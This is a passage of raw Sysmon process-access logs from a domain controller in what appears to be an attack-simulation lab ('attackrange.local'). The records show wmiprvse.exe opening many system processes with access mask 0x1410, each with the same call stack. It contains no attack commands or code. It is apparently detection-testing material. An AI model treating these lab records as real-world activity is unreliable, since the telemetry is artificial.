Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 